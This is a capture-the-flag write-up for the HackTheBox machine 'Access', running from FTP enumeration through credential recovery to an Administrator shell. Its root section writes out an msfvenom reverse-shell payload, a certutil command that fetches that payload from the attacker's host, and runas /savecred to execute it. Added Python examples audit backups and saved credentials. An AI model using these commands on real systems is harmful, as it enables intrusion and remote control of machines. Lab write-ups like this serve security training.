Access from HackTheBox

TL;DR

Anonymous login to an FTP server allowed access to backup files. From the backups, a password for a protected zip could be found. The archive contained emails holding credentials to connect to telnet, allowing a user-level shell. runas could then be used to execute a reverse shell as the Administrator because the account had saved credentials.

User

As ever, let's throw Nmap at it and see what it reveals.

# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.074s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds

This scan reveals 3 open ports:

  • 21/tcp - An FTP server - The default scripts have determined that anonymous login is allowed, which means there are likely to be files we can access.
  • 23/tcp - Telnet - Telnet wants a username and password for authentication, which we don't have yet.
  • 80/tcp - HTTP - At a glance there is nothing useful here.

FTP Server

Nmap determined that the FTP server allows anonymous logins. This means that after we connect to the server with ftp 10.10.10.98 we can log in with the default credentials of anonymous and a blank password.

Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.

We are greeted by two directories: the first, Backups, contains a file named backup.mdb and the second, Engineer, contains a file named Access Control.zip. We can download them with get.

ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 3.23 secs (1.6692 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.13 secs (80.7015 kB/s)

We now have two files from the FTP server. The first appears to be a Microsoft Access database and the second a password-protected zip. The bare-linefeed warnings above mean the transfers ran in ASCII mode; issuing binary before get avoids that.

backup.mdb

Running strings on backup.mdb presents us with the ASCII text from the file. Simply running strings backup.mdb produces too much noise, so the -n option is used to refine the search by setting a minimum string length. strings -n 10 backup.mdb is a sufficient filter, and some potential passwords can be seen, likely for the zip file.

JMOLqQikYdb
MWQM\YbMd^di
MWQM\domMd^di
OLqQikYdbJMMQkk
`YbkbdLiQJ\Yb
`YbkbdLiQJ\dom
`Ybkbd^QJqQ
`YbkbdmdqQimY`Q
`Ybksdi\OJv
bdLiQJ\dom
domdqQimY`Q
administrator;
Administrator<
4555555555555Q
ppermission
backup_admin
[email protected] <--- Looks Suspicious to me
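The same triage can be automated for auditing a backup before it ends up on a share. The following is an added example, not the author's code: it reimplements the strings -n filter, also catches UTF-16LE text (the way Windows and Jet/Access files often store strings), and then keeps only credential-shaped tokens, dropping padding runs such as the 4555555555555Q line above. The sample bytes are constructed, not taken from the real backup.mdb.

```python
import re
from typing import List, Tuple

# Minimum run length; 10 mirrors the "strings -n 10" filter used on backup.mdb.
MIN_LEN = 10

def extract_strings(data: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Return printable runs of at least min_len characters, in file order.
    Plain ASCII runs (what strings reports by default) and UTF-16LE runs
    (one printable byte followed by NUL, repeated) are both collected."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    hits: List[Tuple[int, str]] = []
    hits += [(m.start(), m.group().decode("ascii")) for m in ascii_run.finditer(data)]
    hits += [(m.start(), m.group().decode("utf-16-le")) for m in utf16_run.finditer(data)]
    return [s for _, s in sorted(hits)]

# Heuristic for a credential-shaped token: no whitespace, at least one letter
# plus a digit or separator, and no long repeated character run (this drops
# schema padding such as "4555555555555Q" while keeping "backup_admin").
TOKEN = re.compile(r"^(?=.*[A-Za-z])(?=.*[0-9@_.!$%^&*-])[^\s]{8,}$")
REPEAT = re.compile(r"(.)\1{4,}")

def credential_candidates(strings: List[str]) -> List[str]:
    """Filter extracted strings down to the ones worth a closer look."""
    return [s for s in strings if TOKEN.match(s) and not REPEAT.search(s)]

def build_sample() -> bytes:
    """Constructed bytes in the shape of a Jet database fragment (not the real file)."""
    return (b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 8
            + b"backup_admin\x00\x00\x00"                              # ASCII run
            + "Sup3rS3cret@corp".encode("utf-16-le") + b"\x00\x00"    # UTF-16LE run
            + b"4555555555555Q\x00"                                    # repeated-run noise
            + b"\x7f\x80\x81\x00" * 4)                                 # non-printable filler

if __name__ == "__main__":
    for s in credential_candidates(extract_strings(build_sample())):
        print(s)
```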

Access Control.zip

[email protected] is in fact the password for the zip. However, you'll find that it can't be extracted using unzip, which fails citing unsupported compression method 99. If you look up compression method 99 you'll find that it denotes AES encryption, which isn't currently supported by the unzip binary. Luckily, the system archive manager (in GNOME at least) can be used as an alternative.
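To see why unzip gives up before trying the password, it helps to read the local file header directly: method 99 is the WinZip AE-x marker, and the AES strength and the real compression method sit in a 0x9901 extra field. This is an added example, not the author's code; it parses a constructed header laid out the way an AE-2 entry is written (CRC zeroed, version-needed 51), not the actual Access Control.zip.

```python
import struct
from typing import Dict, List

LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")   # 30-byte zip local file header
AES_EXTRA_ID = 0x9901                        # WinZip AE-x extra field id
METHOD_NAMES = {0: "stored", 8: "deflate", 99: "AES (WinZip AE-x)"}
AES_STRENGTH = {1: "AES-128", 2: "AES-192", 3: "AES-256"}

def parse_extra(extra: bytes) -> Dict[str, object]:
    """Walk the extra field and decode the AE-x record if one is present."""
    info: Dict[str, object] = {}
    pos = 0
    while pos + 4 <= len(extra):
        hid, size = struct.unpack_from("<HH", extra, pos)
        body = extra[pos + 4:pos + 4 + size]
        if hid == AES_EXTRA_ID and size == 7:
            ae_version, _vendor, strength, real_method = struct.unpack("<H2sBH", body)
            info["ae_version"] = ae_version            # AE-2 sets the header CRC to 0
            info["aes"] = AES_STRENGTH.get(strength, "unknown")
            info["real_method"] = METHOD_NAMES.get(real_method, str(real_method))
        pos += 4 + size
    return info

def inspect_zip(data: bytes) -> List[Dict[str, object]]:
    """Return one record per local file header found by scanning for PK\\x03\\x04."""
    entries: List[Dict[str, object]] = []
    pos = 0
    while True:
        pos = data.find(b"PK\x03\x04", pos)
        if pos < 0 or pos + LOCAL_HDR.size > len(data):
            break
        _, _, flags, method, _, _, _, csize, _, nlen, xlen = LOCAL_HDR.unpack_from(data, pos)
        name_start = pos + LOCAL_HDR.size
        name = data[name_start:name_start + nlen].decode("utf-8", "replace")
        extra = data[name_start + nlen:name_start + nlen + xlen]
        entry: Dict[str, object] = {"name": name, "encrypted": bool(flags & 0x1),
                                    "method": METHOD_NAMES.get(method, str(method))}
        entry.update(parse_extra(extra))
        entries.append(entry)
        pos = name_start + nlen + xlen + csize   # skip the entry body before scanning on
    return entries

def build_sample() -> bytes:
    """Constructed AE-2 entry: AES-256 wrapping deflate, placeholder ciphertext."""
    name = b"Access Control.pst"
    extra = struct.pack("<HH", AES_EXTRA_ID, 7) + struct.pack("<H2sBH", 2, b"AE", 3, 8)
    payload = b"\xde\xad\xbe\xef" * 4
    hdr = LOCAL_HDR.pack(b"PK\x03\x04", 51, 0x1, 99, 0, 0, 0, len(payload), 0, len(name), len(extra))
    return hdr + name + extra + payload
```

Python's own zipfile module lists such entries but raises NotImplementedError on extraction for the same reason; 7z and current desktop archive managers handle AE-x.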

[Figure: Extract ZIP - using the system archive manager to extract the problematic zip.]

Within the zip is a .pst file; using file to determine its type yields:

Access Control.pst: Microsoft Outlook email folder (>=2003)

When I first did this box, I'll be honest, I just found an online converter to view the file and, while it's not the best practice, in the heat of the moment while the blood was still very much up for grabs it worked.

This way looks nicer too.

However, you could say the proper way of doing this is with the readpst command.

readpst -o ./ Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

The email can then clearly be seen in the 2.eml file it creates.

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

Either way, once the email is extracted we obtain the username security and the password 4Cc3ssC0ntr0ller. This will likely be for telnet.

Telnet

After connecting with telnet 10.10.10.98 we can confirm that this is indeed the case, as these credentials are accepted. Once connected, navigate to the user.txt flag and print it with type user.txt.

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop

C:\Users\security\Desktop>type user.txt

Root

Start msfconsole and load the generic listener with use exploit/multi/handler. Next, set the payload to windows/meterpreter/reverse_tcp, populate the options as required for your setup, and start the listener with run.

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.13.37.10
lhost => 10.13.37.10
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.37.10      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.37.10:4444

Next we need to generate a payload; to do this we will use:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

Now we need to host this file so that the target can fetch it; to do this we will use Python's SimpleHTTPServer:

python -m SimpleHTTPServer 80

Then, to download the shell, we can make use of certutil (this may not work on all versions of Windows). Because we are using certutil, the web server is hosted on port 80 instead of SimpleHTTPServer's default of 8000.

certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe

Finally we run runas /savecred /user:ACCESS\Administrator shell.exe to execute the shell as the Administrator. This works because the security account has saved credentials for the Administrator account, which runas reuses when /savecred is given.

C:\Users\security\Desktop>cd C:\temp

C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe
**** Online ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe

C:\temp>
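The condition that makes this step work is a privileged credential stored in Credential Manager for a low-privilege user, which an administrator can audit from the output of cmdkey /list. The following is an added example, not from the original write-up: it parses cmdkey output (the sample below is constructed in the shape cmdkey prints, not captured from the box) and reports the entries that runas /savecred could reuse for an account in a privileged list.

```python
from typing import Dict, List, Set

# Constructed sample of `cmdkey /list` output; not captured from the machine.
# "Domain:interactive=" targets are the ones runas /savecred consults.
SAMPLE_CMDKEY = """\
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: Domain:interactive=MEGACORP\\jdoe
    Type: Domain Password
    User: MEGACORP\\jdoe

    Target: Domain:target=fileserver.megacorp.local
    Type: Domain Password
    User: MEGACORP\\svc_backup
"""

def parse_cmdkey(output: str) -> List[Dict[str, str]]:
    """Split cmdkey /list output into one dict per stored credential block."""
    entries: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            if current:
                entries.append(current)
            current = {"target": line.split(":", 1)[1].strip()}
        elif ":" in line and current:           # Type:, User: lines of the open block
            key, value = line.split(":", 1)
            current[key.strip().lower()] = value.strip()
    if current:
        entries.append(current)
    return entries

def runas_usable(entries: List[Dict[str, str]], privileged: Set[str]) -> List[str]:
    """Users whose stored interactive credential maps to a privileged account name."""
    hits: List[str] = []
    for e in entries:
        if not e["target"].lower().startswith("domain:interactive="):
            continue                             # service/share targets are not runas material
        account = e.get("user", "").rsplit("\\", 1)[-1].lower()
        if account in privileged:
            hits.append(e["user"])
    return hits

if __name__ == "__main__":
    print(runas_usable(parse_cmdkey(SAMPLE_CMDKEY), {"administrator"}))
```

Such entries are removed with cmdkey /delete:<target>, and enabling the policy "Network access: Do not allow storage of passwords and credentials for network authentication" stops /savecred from being honoured at all.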

If you look at the msfconsole you should now have a privileged shell waiting for you that can be used to read root.txt.

[*] Started reverse TCP handler on 10.10.13.37:4444
[*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200)

meterpreter > shell
Process 3428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt